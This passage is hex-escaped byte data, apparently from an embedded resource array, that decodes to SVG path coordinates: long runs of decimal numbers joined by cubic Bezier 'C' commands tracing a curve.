\x38\x35\x30\x39\x35\x36\x20\x31\x30\x2e\x31\x39\x39\x39\x37\x36\
\x38\x34\x34\x37\x20\x31\x35\x2e\x33\x34\x35\x36\x36\x35\x34\x38\
\x36\x32\x20\x43\x20\x31\x30\x2e\x32\x30\x36\x32\x31\x37\x39\x31\
\x33\x35\x20\x31\x35\x2e\x33\x34\x39\x35\x34\x35\x38\x37\x36\x39\
\x20\x31\x30\x2e\x32\x31\x32\x34\x35\x38\x39\x38\x32\x34\x20\x31\
\x35\x2e\x33\x35\x32\x36\x30\x30\x36\x30\x30\x33\x20\x31\x30\x2e\
\x32\x31\x38\x37\x30\x30\x30\x35\x31\x32\x20\x31\x35\x2e\x33\x35\
\x34\x38\x33\x32\x32\x34\x30\x31\x20\x43\x20\x31\x30\x2e\x32\x32\
\x34\x39\x34\x31\x31\x32\x30\x31\x20\x31\x35\x2e\x33\x35\x37\x30\
\x36\x33\x38\x37\x39\x38\x20\x31\x30\x2e\x32\x33\x31\x31\x38\x32\
\x31\x38\x38\x39\x20\x31\x35\x2e\x33\x35\x38\x34\x36\x37\x34\x38\
\x34\x33\x20\x31\x30\x2e\x32\x33\x37\x34\x32\x33\x32\x35\x37\x37\
\x20\x31\x35\x2e\x33\x35\x39\x30\x34\x36\x39\x32\x33\x35\x20\x43\
\x20\x31\x30\x2e\x32\x34\x33\x36\x36\x34\x33\x32\x36\x36\x20\x31\
\x35\x2e\x33\x35\x39\x36\x32\x36\x33\x36\x32\x38\x20\x31\x30\x2e\
\x32\x34\x39\x39\x30\x35\x33\x39\x35\x34\x20\x31\x35\x2e\x33\x35\
\x39\x33\x37\x36\x36\x37\x38\x37\x20\x31\x30\x2e\x32\x35\x36\x31\
\x34\x36\x34\x36\x34\x32\x20\x31\x35\x2e\x33\x35\x38\x33\x30\x33\
\x30\x32\x31\x37\x20\x43\x20\x31\x30\x2e\x32\x36\x32\x33\x38\x37\
\x35\x33\x33\x31\x20\x31\x35\x2e\x33\x35\x37\x32\x32\x39\x33\x36\
\x34\x37\x20\x31\x30\x2e\x32\x36\x38\x36\x32\x38\x36\x30\x31\x39\
\x20\x31\x35\x2e\x33\x35\x35\x33\x32\x36\x37\x37\x38\x20\x31\x30\
\x2e\x32\x37\x34\x38\x36\x39\x36\x37\x30\x37\x20\x31\x35\x2e\x33\
\x35\x32\x36\x30\x31\x36\x38\x34\x34\x20\x43\x20\x31\x30\x2e\x32\
\x38\x31\x31\x31\x30\x37\x33\x39\x36\x20\x31\x35\x2e\x33\x34\x39\
\x38\x37\x36\x35\x39\x30\x38\x20\x31\x30\x2e\x32\x38\x37\x33\x35\
\x31\x38\x30\x38\x34\x20\x31\x35\x2e\x33\x34\x36\x33\x32\x34\x30\
\x34\x32\x36\x20\x31\x30\x2e\x32\x39\x33\x35\x39\x32\x38\x37\x37\
\x32\x20\x31\x35\x2e\x33\x34\x31\x39\x35\x31\x37\x32\x34\x38\x20\
\x43\x20\x31\x30\x2e\x32\x39\x39\x38\x33\x33\x39\x34\x36\x31\x20\
\x31\x35\x2e\x33\x33\x37\x35\x37\x39\x34\x30\x37\x31\x20\x31\x30\
\x2e\x33\x30\x36\x30\x37\x35\x30\x31\x34\x39\x20\x31\x35\x2e\x33\
\x33\x32\x33\x38\x32\x33\x38\x38\x37\x20\x31\x30\x2e\x33\x31\x32\
\x33\x31\x36\x30\x38\x33\x38\x20\x31\x35\x2e\x33\x32\x36\x33\x36\
\x39\x36\x30\x35\x34\x20\x43\x20\x31\x30\x2e\x33\x31\x38\x35\x35\
\x37\x31\x35\x32\x36\x20\x31\x35\x2e\x33\x32\x30\x33\x35\x36\x38\
\x32\x32\x32\x20\x31\x30\x2e\x33\x32\x34\x37\x39\x38\x32\x32\x31\
\x34\x20\x31\x35\x2e\x33\x31\x33\x35\x32\x33\x33\x36\x37\x32\x20\
\x31\x30\x2e\x33\x33\x31\x30\x33\x39\x32\x39\x30\x33\x20\x31\x35\
\x2e\x33\x30\x35\x38\x37\x39\x34\x31\x32\x39\x20\x43\x20\x31\x30\
\x2e\x33\x33\x37\x32\x38\x30\x33\x35\x39\x31\x20\x31\x35\x2e\x32\
\x39\x38\x32\x33\x35\x34\x35\x38\x37\x20\x31\x30\x2e\x33\x34\x33\
\x35\x32\x31\x34\x32\x37\x39\x20\x31\x35\x2e\x32\x38\x39\x37\x37\
\x36\x31\x33\x30\x31\x20\x31\x30\x2e\x33\x34\x39\x37\x36\x32\x34\
\x39\x36\x38\x20\x31\x35\x2e\x32\x38\x30\x35\x31\x32\x38\x32\x30\
\x39\x20\x43\x20\x31\x30\x2e\x33\x35\x36\x30\x30\x33\x35\x36\x35\
\x36\x20\x31\x35\x2e\x32\x37\x31\x32\x34\x39\x35\x31\x31\x36\x20\
\x31\x30\x2e\x33\x36\x32\x32\x34\x34\x36\x33\x34\x34\x20\x31\x35\
\x2e\x32\x36\x31\x31\x37\x37\x33\x38\x35\x38\x20\x31\x30\x2e\x33\
\x36\x38\x34\x38\x35\x37\x30\x33\x33\x20\x31\x35\x2e\x32\x35\x30\
\x33\x30\x39\x30\x34\x30\x36\x20\x43\x20\x31\x30\x2e\x33\x37\x34\
\x37\x32\x36\x37\x37\x32\x31\x20\x31\x35\x2e\x32\x33\x39\x34\x34\
\x30\x36\x39\x35\x34\x20\x31\x30\x2e\x33\x38\x30\x39\x36\x37\x38\
\x34\x31\x20\x31\x35\x2e\x32\x32\x37\x37\x37\x31\x33\x34\x31\x38\
\x20\x31\x30\x2e\x33\x38\x37\x32\x30\x38\x39\x30\x39\x38\x20\x31\
\x35\x2e\x32\x31\x35\x33\x31\x34\x37\x36\x30\x39\x20\x43\x20\x31\
\x30\x2e\x33\x39\x33\x34\x34\x39\x39\x37\x38\x36\x20\x31\x35\x2e\
\x32\x30\x32\x38\x35\x38\x31\x37\x39\x39\x20\x31\x30\x2e\x33\x39\
\x39\x36\x39\x31\x30\x34\x37\x35\x20\x31\x35\x2e\x31\x38\x39\x36\
\x30\x39\x36\x33\x36\x39\x20\x31\x30\x2e\x34\x30\x35\x39\x33\x32\
\x31\x31\x36\x33\x20\x31\x35\x2e\x31\x37\x35\x35\x38\x34\x30\x37\
\x35\x34\x20\x43\x20\x31\x30\x2e\x34\x31\x32\x31\x37\x33\x31\x38\
\x35\x31\x20\x31\x35\x2e\x31\x36\x31\x35\x35\x38\x35\x31\x34\x20\
\x31\x30\x2e\x34\x31\x38\x34\x31\x34\x32\x35\x34\x20\x31\x35\x2e\
\x31\x34\x36\x37\x35\x31\x32\x36\x30\x39\x20\x31\x30\x2e\x34\x32\
\x34\x36\x35\x35\x33\x32\x32\x38\x20\x31\x35\x2e\x31\x33\x31\x31\
\x37\x38\x33\x39\x39\x35\x20\x43\x20\x31\x30\x2e\x34\x33\x30\x38\
\x39\x36\x33\x39\x31\x36\x20\x31\x35\x2e\x31\x31\x35\x36\x30\x35\
\x35\x33\x38\x31\x20\x31\x30\x2e\x34\x33\x37\x31\x33\x37\x34\x36\
\x30\x35\x20\x31\x35\x2e\x30\x39\x39\x32\x36\x32\x34\x36\x33\x38\
\x20\x31\x30\x2e\x34\x34\x33\x33\x37\x38\x35\x32\x39\x33\x20\x31\
\x35\x2e\x30\x38\x32\x31\x36\x36\x33\x37\x34\x38\x20\x43\x20\x31\
\x30\x2e\x34\x34\x39\x36\x31\x39\x35\x39\x38\x31\x20\x31\x35\x2e\
\x30\x36\x35\x30\x37\x30\x32\x38\x35\x39\x20\x31\x30\x2e\x34\x35\
\x35\x38\x36\x30\x36\x36\x37\x20\x31\x35\x2e\x30\x34\x37\x32\x31\
\x36\x36\x35\x33\x34\x20\x31\x30\x2e\x34\x36\x32\x31\x30\x31\x37\
\x33\x35\x38\x20\x31\x35\x2e\x30\x32\x38\x36\x32\x33\x37\x36\x33\
\x38\x20\x43\x20\x31\x30\x2e\x34\x36\x38\x33\x34\x32\x38\x30\x34\
\x37\x20\x31\x35\x2e\x30\x31\x30\x30\x33\x30\x38\x37\x34\x32\x20\
\x31\x30\x2e\x34\x37\x34\x35\x38\x33\x38\x37\x33\x35\x20\x31\x34\
\x2e\x39\x39\x30\x36\x39\x34\x32\x38\x31\x36\x20\x31\x30\x2e\x34\
\x38\x30\x38\x32\x34\x39\x34\x32\x33\x20\x31\x34\x2e\x39\x37\x30\
\x36\x33\x33\x33\x33\x32\x20\x43\x20\x31\x30\x2e\x34\x38\x37\x30\
\x36\x36\x30\x31\x31\x32\x20\x31\x34\x2e\x39\x35\x30\x35\x37\x32\
\x33\x38\x32\x34\x20\x31\x30\x2e\x34\x39\x33\x33\x30\x37\x30\x38\
\x20\x31\x34\x2e\x39\x32\x39\x37\x38\x32\x37\x31\x39\x38\x20\x31\
\x30\x2e\x34\x39\x39\x35\x34\x38\x31\x34\x38\x38\x20\x31\x34\x2e\
\x39\x30\x38\x32\x38\x34\x37\x32\x30\x33\x20\x43\x20\x31\x30\x2e\
\x35\x30\x35\x37\x38\x39\x32\x31\x37\x37\x20\x31\x34\x2e\x38\x38\
\x36\x37\x38\x36\x37\x32\x30\x37\x20\x31\x30\x2e\x35\x31\x32\x30\
\x33\x30\x32\x38\x36\x35\x20\x31\x34\x2e\x38\x36\x34\x35\x37\x36\
\x31\x32\x34\x37\x20\x31\x30\x2e\x35\x31\x38\x32\x37\x31\x33\x35\
\x35\x33\x20\x31\x34\x2e\x38\x34\x31\x36\x37\x34\x33\x30\x36\x35\
\x20\x43\x20\x31\x30\x2e\x35\x32\x34\x35\x31\x32\x34\x32\x34\x32\
\x20\x31\x34\x2e\x38\x31\x38\x37\x37\x32\x34\x38\x38\x34\x20\x31\
\x30\x2e\x35\x33\x30\x37\x35\x33\x34\x39\x33\x20\x31\x34\x2e\x37\
\x39\x35\x31\x37\x35\x32\x39\x31\x37\x20\x31\x30\x2e\x35\x33\x36\
\x39\x39\x34\x35\x36\x31\x39\x20\x31\x34\x2e\x37\x37\x30\x39\x30\
\x35\x30\x35\x36\x34\x20\x43\x20\x31\x30\x2e\x35\x34\x33\x32\x33\
\x35\x36\x33\x30\x37\x20\x31\x34\x2e\x37\x34\x36\x36\x33\x34\x38\
\x32\x31\x31\x20\x31\x30\x2e\x35\x34\x39\x34\x37\x36\x36\x39\x39\
\x35\x20\x31\x34\x2e\x37\x32\x31\x36\x38\x37\x35\x30\x30\x31\x20\
\x31\x30\x2e\x35\x35\x35\x37\x31\x37\x37\x36\x38\x34\x20\x31\x34\
\x2e\x36\x39\x36\x30\x38\x36\x33\x36\x34\x32\x20\x43\x20\x31\x30\
\x2e\x35\x36\x31\x39\x35\x38\x38\x33\x37\x32\x20\x31\x34\x2e\x36\
\x37\x30\x34\x38\x35\x32\x32\x38\x33\x20\x31\x30\x2e\x35\x36\x38\
\x31\x39\x39\x39\x30\x36\x20\x31\x34\x2e\x36\x34\x34\x32\x32\x36\
\x33\x34\x36\x33\x20\x31\x30\x2e\x35\x37\x34\x34\x34\x30\x39\x37\
\x34\x39\x20\x31\x34\x2e\x36\x31\x37\x33\x33\x33\x38\x38\x33\x39\
\x20\x43\x20\x31\x30\x2e\x35\x38\x30\x36\x38\x32\x30\x34\x33\x37\
\x20\x31\x34\x2e\x35\x39\x30\x34\x34\x31\x34\x32\x31\x34\x20\x31\
\x30\x2e\x35\x38\x36\x39\x32\x33\x31\x31\x32\x35\x20\x31\x34\x2e\
\x35\x36\x32\x39\x31\x31\x35\x36\x39\x20\x31\x30\x2e\x35\x39\x33\
\x31\x36\x34\x31\x38\x31\x34\x20\x31\x34\x2e\x35\x33\x34\x37\x36\
\x39\x33\x35\x30\x31\x20\x43\x20\x31\x30\x2e\x35\x39\x39\x34\x30\
\x35\x32\x35\x30\x32\x20\x31\x34\x2e\x35\x30\x36\x36\x32\x37\x31\
\x33\x31\x31\x20\x31\x30\x2e\x36\x30\x35\x36\x34\x36\x33\x31\x39\
\x20\x31\x34\x2e\x34\x37\x37\x38\x36\x38\x38\x36\x33\x38\x20\x31\
\x30\x2e\x36\x31\x31\x38\x38\x37\x33\x38\x37\x39\x20\x31\x34\x2e\
\x34\x34\x38\x35\x32\x30\x33\x39\x30\x33\x20\x43\x20\x31\x30\x2e\
\x36\x31\x38\x31\x32\x38\x34\x35\x36\x37\x20\x31\x34\x2e\x34\x31\
\x39\x31\x37\x31\x39\x31\x36\x37\x20\x31\x30\x2e\x36\x32\x34\x33\
\x36\x39\x35\x32\x35\x36\x20\x31\x34\x2e\x33\x38\x39\x32\x32\x39\
\x36\x38\x38\x36\x20\x31\x30\x2e\x36\x33\x30\x36\x31\x30\x35\x39\
\x34\x34\x20\x31\x34\x2e\x33\x35\x38\x37\x32\x30\x33\x32\x37\x31\
\x20\x43\x20\x31\x30\x2e\x36\x33\x36\x38\x35\x31\x36\x36\x33\x32\
\x20\x31\x34\x2e\x33\x32\x38\x32\x31\x30\x39\x36\x35\x35\x20\x31\
\x30\x2e\x36\x34\x33\x30\x39\x32\x37\x33\x32\x31\x20\x31\x34\x2e\
\x32\x39\x37\x31\x33\x31\x30\x36\x31\x20\x31\x30\x2e\x36\x34\x39\
\x33\x33\x33\x38\x30\x30\x39\x20\x31\x34\x2e\x32\x36\x35\x35\x30\
\x37\x39\x37\x32\x34\x20\x43\x20\x31\x30\x2e\x36\x35\x35\x35\x37\
\x34\x38\x36\x39\x37\x20\x31\x34\x2e\x32\x33\x33\x38\x38\x34\x38\
\x38\x33\x39\x20\x31\x30\x2e\x36\x36\x31\x38\x31\x35\x39\x33\x38\
\x36\x20\x31\x34\x2e\x32\x30\x31\x37\x31\x35\x33\x34\x36\x20\x31\
\x30\x2e\x36\x36\x38\x30\x35\x37\x30\x30\x37\x34\x20\x31\x34\x2e\
\x31\x36\x39\x30\x32\x37\x34\x31\x33\x31\x20\x43\x20\x31\x30\x2e\
\x36\x37\x34\x32\x39\x38\x30\x37\x36\x32\x20\x31\x34\x2e\x31\x33\
\x36\x33\x33\x39\x34\x38\x30\x32\x20\x31\x30\x2e\x36\x38\x30\x35\
\x33\x39\x31\x34\x35\x31\x20\x31\x34\x2e\x31\x30\x33\x31\x33\x30\
\x30\x33\x36\x31\x20\x31\x30\x2e\x36\x38\x36\x37\x38\x30\x32\x31\
\x33\x39\x20\x31\x34\x2e\x30\x36\x39\x34\x32\x37\x37\x38\x37\x35\
\x20\x43\x20\x31\x30\x2e\x36\x39\x33\x30\x32\x31\x32\x38\x32\x38\
\x20\x31\x34\x2e\x30\x33\x35\x37\x32\x35\x35\x33\x38\x39\x20\x31\
\x30\x2e\x36\x39\x39\x32\x36\x32\x33\x35\x31\x36\x20\x31\x34\x2e\
\x30\x30\x31\x35\x32\x37\x35\x32\x33\x36\x20\x31\x30\x2e\x37\x30\
\x35\x35\x30\x33\x34\x32\x30\x34\x20\x31\x33\x2e\x39\x36\x36\x38\
\x36\x33\x30\x35\x35\x38\x20\x43\x20\x31\x30\x2e\x37\x31\x31\x37\
\x34\x34\x34\x38\x39\x33\x20\x31\x33\x2e\x39\x33\x32\x31\x39\x38\
\x35\x38\x38\x20\x31\x30\x2e\x37\x31\x37\x39\x38\x35\x35\x35\x38\
\x31\x20\x31\x33\x2e\x38\x39\x37\x30\x36\x34\x38\x36\x34\x33\x20\
\x31\x30\x2e\x37\x32\x34\x32\x32\x36\x36\x32\x36\x39\x20\x31\x33\
\x2e\x38\x36\x31\x34\x39\x31\x37\x36\x31\x34\x20\x43\x20\x31\x30\
\x2e\x37\x33\x30\x34\x36\x37\x36\x39\x35\x38\x20\x31\x33\x2e\x38\
\x32\x35\x39\x31\x38\x36\x35\x38\x34\x20\x31\x30\x2e\x37\x33\x36\
\x37\x30\x38\x37\x36\x34\x36\x20\x31\x33\x2e\x37\x38\x39\x39\x30\
\x33\x35\x33\x35\x37\x20\x31\x30\x2e\x37\x34\x32\x39\x34\x39\x38\
\x33\x33\x34\x20\x31\x33\x2e\x37\x35\x33\x34\x37\x36\x37\x38\x36\
\x20\x43\x20\x31\x30\x2e\x37\x34\x39\x31\x39\x30\x39\x30\x32\x33\
\x20\x31\x33\x2e\x37\x31\x37\x30\x35\x30\x30\x33\x36\x34\x20\x31\
\x30\x2e\x37\x35\x35\x34\x33\x31\x39\x37\x31\x31\x20\x31\x33\x2e\
\x36\x38\x30\x32\x30\x39\x31\x38\x36\x34\x20\x31\x30\x2e\x37\x36\
\x31\x36\x37\x33\x30\x33\x39\x39\x20\x31\x33\x2e\x36\x34\x32\x39\
\x38\x35\x30\x39\x38\x31\x20\x43\x20\x31\x30\x2e\x37\x36\x37\x39\
\x31\x34\x31\x30\x38\x38\x20\x31\x33\x2e\x36\x30\x35\x37\x36\x31\
\x30\x30\x39\x39\x20\x31\x30\x2e\x37\x37\x34\x31\x35\x35\x31\x37\
\x37\x36\x20\x31\x33\x2e\x35\x36\x38\x31\x35\x31\x33\x38\x30\x38\
\x20\x31\x30\x2e\x37\x38\x30\x33\x39\x36\x32\x34\x36\x35\x20\x31\
\x33\x2e\x35\x33\x30\x31\x38\x37\x34\x39\x34\x35\x20\x43\x20\x31\
\x30\x2e\x37\x38\x36\x36\x33\x37\x33\x31\x35\x33\x20\x31\x33\x2e\
\x34\x39\x32\x32\x32\x33\x36\x30\x38\x33\x20\x31\x30\x2e\x37\x39\
\x32\x38\x37\x38\x33\x38\x34\x31\x20\x31\x33\x2e\x34\x35\x33\x39\
\x30\x33\x33\x33\x36\x36\x20\x31\x30\x2e\x37\x39\x39\x31\x31\x39\
\x34\x35\x33\x20\x31\x33\x2e\x34\x31\x35\x32\x35\x38\x33\x33\x36\
\x35\x20\x43\x20\x31\x30\x2e\x38\x30\x35\x33\x36\x30\x35\x32\x31\
\x38\x20\x31\x33\x2e\x33\x37\x36\x36\x31\x33\x33\x33\x36\x34\x20\
\x31\x30\x2e\x38\x31\x31\x36\x30\x31\x35\x39\x30\x36\x20\x31\x33\
\x2e\x33\x33\x37\x36\x34\x31\x36\x35\x37\x33\x20\x31\x30\x2e\x38\
\x31\x37\x38\x34\x32\x36\x35\x39\x35\x20\x31\x33\x2e\x32\x39\x38\
\x33\x37\x35\x32\x38\x30\x33\x20\x43\x20\x31\x30\x2e\x38\x32\x34\
\x30\x38\x33\x37\x32\x38\x33\x20\x31\x33\x2e\x32\x35\x39\x31\x30\
\x38\x39\x30\x33\x34\x20\x31\x30\x2e\x38\x33\x30\x33\x32\x34\x37\
\x39\x37\x31\x20\x31\x33\x2e\x32\x31\x39\x35\x34\x36\x30\x35\x38\
\x38\x20\x31\x30\x2e\x38\x33\x36\x35\x36\x35\x38\x36\x36\x20\x31\
\x33\x2e\x31\x37\x39\x37\x31\x39\x30\x30\x32\x35\x20\x43\x20\x31\
\x30\x2e\x38\x34\x32\x38\x30\x36\x39\x33\x34\x38\x20\x31\x33\x2e\
\x31\x33\x39\x38\x39\x31\x39\x34\x36\x33\x20\x31\x30\x2e\x38\x34\
\x39\x30\x34\x38\x30\x30\x33\x37\x20\x31\x33\x2e\x30\x39\x39\x37\
\x39\x39\x30\x39\x32\x20\x31\x30\x2e\x38\x35\x35\x32\x38\x39\x30\
\x37\x32\x35\x20\x31\x33\x2e\x30\x35\x39\x34\x37\x32\x39\x32\x30\
\x37\x20\x43\x20\x31\x30\x2e\x38\x36\x31\x35\x33\x30\x31\x34\x31\
\x33\x20\x31\x33\x2e\x30\x31\x39\x31\x34\x36\x37\x34\x39\x34\x20\
\x31\x30\x2e\x38\x36\x37\x37\x37\x31\x32\x31\x30\x32\x20\x31\x32\
\x2e\x39\x37\x38\x35\x38\x35\x38\x36\x30\x35\x20\x31\x30\x2e\x38\
\x37\x34\x30\x31\x32\x32\x37\x39\x20\x31\x32\x2e\x39\x33\x37\x38\
\x32\x32\x39\x30\x39\x39\x20\x43\x20\x31\x30\x2e\x38\x38\x30\x32\
\x35\x33\x33\x34\x37\x38\x20\x31\x32\x2e\x38\x39\x37\x30\x35\x39\
\x39\x35\x39\x33\x20\x31\x30\x2e\x38\x38\x36\x34\x39\x34\x34\x31\
\x36\x37\x20\x31\x32\x2e\x38\x35\x36\x30\x39\x33\x37\x33\x34\x34\
\x20\x31\x30\x2e\x38\x39\x32\x37\x33\x35\x34\x38\x35\x35\x20\x31\
\x32\x2e\x38\x31\x34\x39\x35\x37\x30\x31\x35\x34\x20\x43\x20\x31\
\x30\x2e\x38\x39\x38\x39\x37\x36\x35\x35\x34\x33\x20\x31\x32\x2e\
\x37\x37\x33\x38\x32\x30\x32\x39\x36\x34\x20\x31\x30\x2e\x39\x30\
\x35\x32\x31\x37\x36\x32\x33\x32\x20\x31\x32\x2e\x37\x33\x32\x35\
\x31\x32\x30\x36\x30\x37\x20\x31\x30\x2e\x39\x31\x31\x34\x35\x38\
\x36\x39\x32\x20\x31\x32\x2e\x36\x39\x31\x30\x36\x35\x31\x36\x32\
\x20\x43\x20\x31\x30\x2e\x39\x31\x37\x36\x39\x39\x37\x36\x30\x39\
\x20\x31\x32\x2e\x36\x34\x39\x36\x31\x38\x32\x36\x33\x33\x20\x31\
\x30\x2e\x39\x32\x33\x39\x34\x30\x38\x32\x39\x37\x20\x31\x32\x2e\
\x36\x30\x38\x30\x33\x31\x38\x37\x30\x35\x20\x31\x30\x2e\x39\x33\
\x30\x31\x38\x31\x38\x39\x38\x35\x20\x31\x32\x2e\x35\x36\x36\x33\
\x33\x38\x38\x36\x30\x33\x20\x43\x20\x31\x30\x2e\x39\x33\x36\x34\
\x32\x32\x39\x36\x37\x34\x20\x31\x32\x2e\x35\x32\x34\x36\x34\x35\
\x38\x35\x30\x31\x20\x31\x30\x2e\x39\x34\x32\x36\x36\x34\x30\x33\
\x36\x32\x20\x31\x32\x2e\x34\x38\x32\x38\x34\x35\x35\x38\x34\x31\
\x20\x31\x30\x2e\x39\x34\x38\x39\x30\x35\x31\x30\x35\x20\x31\x32\
\x2e\x34\x34\x30\x39\x37\x30\x39\x31\x30\x39\x20\x43\x20\x31\x30\
\x2e\x39\x35\x35\x31\x34\x36\x31\x37\x33\x39\x20\x31\x32\x2e\x33\
\x39\x39\x30\x39\x36\x32\x33\x37\x37\x20\x31\x30\x2e\x39\x36\x31\
\x33\x38\x37\x32\x34\x32\x37\x20\x31\x32\x2e\x33\x35\x37\x31\x34\
\x36\x37\x31\x32\x39\x20\x31\x30\x2e\x39\x36\x37\x36\x32\x38\x33\
\x31\x31\x35\x20\x31\x32\x2e\x33\x31\x35\x31\x35\x35\x31\x30\x36\
\x32\x20\x43\x20\x31\x30\x2e\x39\x37\x33\x38\x36\x39\x33\x38\x30\
\x34\x20\x31\x32\x2e\x32\x37\x33\x31\x36\x33\x34\x39\x39\x35\x20\
\x31\x30\x2e\x39\x38\x30\x31\x31\x30\x34\x34\x39\x32\x20\x31\x32\
\x2e\x32\x33\x31\x31\x32\x39\x35\x36\x30\x39\x20\x31\x30\x2e\x39\
\x38\x36\x33\x35\x31\x35\x31\x38\x20\x31\x32\x2e\x31\x38\x39\x30\
\x38\x35\x39\x33\x30\x39\x20\x43\x20\x31\x30\x2e\x39\x39\x32\x35\
\x39\x32\x35\x38\x36\x39\x20\x31\x32\x2e\x31\x34\x37\x30\x34\x32\
\x33\x30\x30\x39\x20\x31\x30\x2e\x39\x39\x38\x38\x33\x33\x36\x35\
\x35\x37\x20\x31\x32\x2e\x31\x30\x34\x39\x38\x38\x39\x32\x34\x31\
\x20\x31\x31\x2e\x30\x30\x35\x30\x37\x34\x37\x32\x34\x36\x20\x31\
\x32\x2e\x30\x36\x32\x39\x35\x38\x32\x36\x31\x33\x20\x43\x20\x31\
\x31\x2e\x30\x31\x31\x33\x31\x35\x37\x39\x33\x34\x20\x31\x32\x2e\
\x30\x32\x30\x39\x32\x37\x35\x39\x38\x35\x20\x31\x31\x2e\x30\x31\
\x37\x35\x35\x36\x38\x36\x32\x32\x20\x31\x31\x2e\x39\x37\x38\x39\
\x31\x39\x37\x38\x39\x33\x20\x31\x31\x2e\x30\x32\x33\x37\x39\x37\
\x39\x33\x31\x31\x20\x31\x31\x2e\x39\x33\x36\x39\x36\x37\x30\x36\
\x34\x33\x20\x43\x20\x31\x31\x2e\x30\x33\x30\x30\x33\x38\x39\x39\
\x39\x39\x20\x31\x31\x2e\x38\x39\x35\x30\x31\x34\x33\x33\x39\x32\
\x20\x31\x31\x2e\x30\x33\x36\x32\x38\x30\x30\x36\x38\x37\x20\x31\
\x31\x2e\x38\x35\x33\x31\x31\x37\x30\x33\x32\x38\x20\x31\x31\x2e\
\x30\x34\x32\x35\x32\x31\x31\x33\x37\x36\x20\x31\x31\x2e\x38\x31\
\x31\x33\x30\x37\x30\x39\x35\x36\x20\x43\x20\x31\x31\x2e\x30\x34\
\x38\x37\x36\x32\x32\x30\x36\x34\x20\x31\x31\x2e\x37\x36\x39\x34\
\x39\x37\x31\x35\x38\x34\x20\x31\x31\x2e\x30\x35\x35\x30\x30\x33\
\x32\x37\x35\x32\x20\x31\x31\x2e\x37\x32\x37\x37\x37\x35\x31\x31\
\x39\x31\x20\x31\x31\x2e\x30\x36\x31\x32\x34\x34\x33\x34\x34\x31\
\x20\x31\x31\x2e\x36\x38\x36\x31\x37\x32\x35\x39\x39\x20\x43\x20\
\x31\x31\x2e\x30\x36\x37\x34\x38\x35\x34\x31\x32\x39\x20\x31\x31\
\x2e\x36\x34\x34\x35\x37\x30\x30\x37\x39\x20\x31\x31\x2e\x30\x37\
\x33\x37\x32\x36\x34\x38\x31\x38\x20\x31\x31\x2e\x36\x30\x33\x30\
\x38\x37\x38\x30\x30\x33\x20\x31\x31\x2e\x30\x37\x39\x39\x36\x37\
\x35\x35\x30\x36\x20\x31\x31\x2e\x35\x36\x31\x37\x35\x37\x30\x30\
\x36\x31\x20\x43\x20\x31\x31\x2e\x30\x38\x36\x32\x30\x38\x36\x31\
\x39\x34\x20\x31\x31\x2e\x35\x32\x30\x34\x32\x36\x32\x31\x32\x20\
\x31\x31\x2e\x30\x39\x32\x34\x34\x39\x36\x38\x38\x33\x20\x31\x31\
\x2e\x34\x37\x39\x32\x34\x37\x38\x31\x36\x38\x20\x31\x31\x2e\x30\
\x39\x38\x36\x39\x30\x37\x35\x37\x31\x20\x31\x31\x2e\x34\x33\x38\
\x32\x35\x32\x36\x33\x37\x32\x20\x43\x20\x31\x31\x2e\x31\x30\x34\
\x39\x33\x31\x38\x32\x35\x39\x20\x31\x31\x2e\x33\x39\x37\x32\x35\
\x37\x34\x35\x37\x37\x20\x31\x31\x2e\x31\x31\x31\x31\x37\x32\x38\
\x39\x34\x38\x20\x31\x31\x2e\x33\x35\x36\x34\x34\x36\x35\x39\x39\
\x20\x31\x31\x2e\x31\x31\x37\x34\x31\x33\x39\x36\x33\x36\x20\x31\
\x31\x2e\x33\x31\x35\x38\x35\x30\x34\x30\x33\x39\x20\x43\x20\x31\
\x31\x2e\x31\x32\x33\x36\x35\x35\x30\x33\x32\x34\x20\x31\x31\x2e\
\x32\x37\x35\x32\x35\x34\x32\x30\x38\x39\x20\x31\x31\x2e\x31\x32\
\x39\x38\x39\x36\x31\x30\x31\x33\x20\x31\x31\x2e\x32\x33\x34\x38\
\x37\x33\x39\x37\x31\x38\x20\x31\x31\x2e\x31\x33\x36\x31\x33\x37\
\x31\x37\x30\x31\x20\x31\x31\x2e\x31\x39\x34\x37\x33\x39\x35\x31\
\x34\x34\x20\x43\x20\x31\x31\x2e\x31\x34\x32\x33\x37\x38\x32\x33\
\x38\x39\x20\x31\x31\x2e\x31\x35\x34\x36\x30\x35\x30\x35\x36\x39\
\x20\x31\x31\x2e\x31\x34\x38\x36\x31\x39\x33\x30\x37\x38\x20\x31\
\x31\x2e\x31\x31\x34\x37\x31\x37\x38\x36\x30\x37\x20\x31\x31\x2e\
\x31\x35\x34\x38\x36\x30\x33\x37\x36\x36\x20\x31\x31\x2e\x30\x37\
\x35\x31\x30\x37\x31\x38\x30\x34\x20\x43\x20\x31\x31\x2e\x31\x36\
\x31\x31\x30\x31\x34\x34\x35\x35\x20\x31\x31\x2e\x30\x33\x35\x34\
\x39\x36\x35\x20\x31\x31\x2e\x31\x36\x37\x33\x34\x32\x35\x31\x34\
\x33\x20\x31\x30\x2e\x39\x39\x36\x31\x36\x34\x30\x30\x31\x38\x20\
\x31\x31\x2e\x31\x37\x33\x35\x38\x33\x35\x38\x33\x31\x20\x31\x30\
\x2e\x39\x35\x37\x31\x33\x38\x33\x32\x38\x33\x20\x43\x20\x31\x31\
\x2e\x31\x37\x39\x38\x32\x34\x36\x35\x32\x20\x31\x30\x2e\x39\x31\
\x38\x31\x31\x32\x36\x35\x34\x37\x20\x31\x31\x2e\x31\x38\x36\x30\
\x36\x35\x37\x32\x30\x38\x20\x31\x30\x2e\x38\x37\x39\x33\x39\x35\
\x36\x35\x34\x34\x20\x31\x31\x2e\x31\x39\x32\x33\x30\x36\x37\x38\
\x39\x36\x20\x31\x30\x2e\x38\x34\x31\x30\x31\x35\x33\x31\x33\x31\
\x20\x43\x20\x31\x31\x2e\x31\x39\x38\x35\x34\x37\x38\x35\x38\x35\
\x20\x31\x30\x2e\x38\x30\x32\x36\x33\x34\x39\x37\x31\x38\x20\x31\
\x31\x2e\x32\x30\x34\x37\x38\x38\x39\x32\x37\x33\x20\x31\x30\x2e\
\x37\x36\x34\x35\x39\x33\x33\x31\x37\x36\x20\x31\x31\x2e\x32\x31\
\x31\x30\x32\x39\x39\x39\x36\x31\x20\x31\x30\x2e\x37\x32\x36\x39\
\x31\x37\x36\x33\x36\x35\x20\x43\x20\x31\x31\x2e\x32\x31\x37\x32\
\x37\x31\x30\x36\x35\x20\x31\x30\x2e\x36\x38\x39\x32\x34\x31\x39\
\x35\x35\x34\x20\x31\x31\x2e\x32\x32\x33\x35\x31\x32\x31\x33\x33\
